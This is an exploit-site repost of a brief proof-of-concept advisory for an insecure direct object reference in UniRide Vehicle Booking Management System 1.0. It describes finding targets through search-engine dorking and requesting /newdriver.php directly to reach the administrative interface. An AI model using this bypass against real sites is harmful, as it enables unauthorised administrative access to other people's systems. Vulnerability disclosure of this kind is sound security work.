Exploit for UniRide Vehicle Booking Management System 1.0 Insecure Direct Object Reference

Name: Exploit for UniRide Vehicle Booking Management System 1.0 Insecure Direct Object Reference
Rating: 5 (114 reviews)

2025-03-06 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:189592
=============================================================================================================================================
    | # Title     : UniRide Vehicle Booking Management System 1.0 IDOR Vulnerability                                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-management-zip.zip               |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] suffers from an insecure direct object reference that allows users to access the administrative interface.
    
    [+] Use PAyload : /newdriver.php
    
    [+] USage : http://127.0.0.1/Vehicle%20Management/newdriver.php
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================